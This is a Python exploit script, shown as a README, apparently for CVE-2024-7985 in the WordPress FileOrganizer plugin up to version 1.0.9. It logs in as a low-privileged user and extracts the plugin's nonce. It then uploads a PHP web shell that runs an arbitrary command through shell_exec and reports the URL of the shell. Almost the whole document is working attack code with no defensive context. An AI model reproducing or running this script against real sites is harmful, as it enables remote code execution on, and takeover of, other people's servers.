README.md
Rendering markdown...
import requests
import re
import argparse
from bs4 import BeautifulSoup
requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
banner = """
'######::'##::::'##:'########:::::::::::'#######::::'#####::::'#######::'##:::::::::::::::::'########::'#######:::'#######::'########:
'##... ##: ##:::: ##: ##.....:::::::::::'##.... ##::'##.. ##::'##.... ##: ##:::'##::::::::::: ##.. ##:'##.... ##:'##.... ##: ##.....::
##:::..:: ##:::: ##: ##::::::::::::::::..::::: ##:'##:::: ##:..::::: ##: ##::: ##:::::::::::..:: ##::: ##:::: ##: ##:::: ##: ##:::::::
##::::::: ##:::: ##: ######:::'#######::'#######:: ##:::: ##::'#######:: ##::: ##::'#######:::: ##::::: ########:: #######:: #######::
##:::::::. ##:: ##:: ##...::::........:'##:::::::: ##:::: ##:'##:::::::: #########:........::: ##::::::...... ##:'##.... ##:...... ##:
##::: ##::. ## ##::: ##:::::::::::::::: ##::::::::. ##:: ##:: ##::::::::...... ##::::::::::::: ##:::::'##:::: ##: ##:::: ##:'##::: ##:
. ######::::. ###:::: ########:::::::::: #########::. #####::: #########::::::: ##::::::::::::: ##:::::. #######::. #######::. ######::
:......::::::...:::::........::::::::::By Nxploit Khaled_alenazi....:::::::::::..::::::::::::::..:::::::.......::::.......::::......:::
"""
parser = argparse.ArgumentParser(description="FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi")
parser.add_argument("--url", required=True, help="Target WordPress site URL")
parser.add_argument("--username", required=True, help="WordPress Username")
parser.add_argument("--password", required=True, help="WordPress Password")
parser.add_argument("--cmd", default="ls -la /", help="Command to execute in uploaded file")
args = parser.parse_args()
print(banner)
def check_version(url):
version_url = f"{url}/wp-content/plugins/fileorganizer/readme.txt"
response = session.get(version_url, headers=headers, verify=False)
if response.status_code == 200:
version_match = re.search(r'Stable tag:\s*(\d+\.\d+\.\d+)', response.text)
if version_match:
version = version_match.group(1)
if version <= "1.0.9":
print(f"[+] Vulnerable version detected: {version}")
return True
print("[-] Target is not vulnerable or unreachable.")
return False
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"}
if not check_version(args.url):
exit()
login_url = f"{args.url}/wp-login.php"
login_data = {
"log": args.username,
"pwd": args.password,
"rememberme": "forever",
"wp-submit": "Log In"
}
response = session.post(login_url, data=login_data, headers=headers)
if any("wordpress_logged_in" in cookie.name for cookie in session.cookies):
print("[+] Logged in successfully!")
else:
print("[-] Failed to log in. Check your credentials.")
exit()
admin_url = f"{args.url}/wp-admin/admin.php?page=fileorganizer"
response = session.get(admin_url, headers=headers)
soup = BeautifulSoup(response.text, 'html.parser')
nonce_match = re.search(r'var fileorganizer_ajax_nonce = "(.*?)";', response.text)
if nonce_match:
nonce = nonce_match.group(1)
print(f"[+] Extracted nonce: {nonce}")
else:
print("[-] Failed to extract nonce.")
exit()
exploit_url = f"{args.url}/wp-admin/admin-ajax.php"
files = {
"upload[]": ("cmd.php", f"<?php\n echo '<pre>' . shell_exec('{args.cmd}') . '</pre>';\n?>", "application/x-php")
}
data = {
"reqid": "1950b7157c315a",
"cmd": "upload",
"target": "l1_d3AtY29udGVudA",
"action": "fileorganizer_file_folder_manager",
"fileorganizer_nonce": nonce,
"mtime[]": "1738507656"
}
response = session.post(exploit_url, files=files, data=data, headers=headers)
print("[+] Server Response:")
print(response.status_code, response.reason)
print(response.headers)
print(response.text)
if "cmd.php" in response.text:
try:
json_response = response.json()
file_url = json_response['added'][0]['url']
print(f"[+] File uploaded successfully!")
print(f"[+] Access file at: {file_url}")
except Exception as e:
print("[!] Error extracting file URL from response:", str(e))
else:
print("[-] Upload failed!")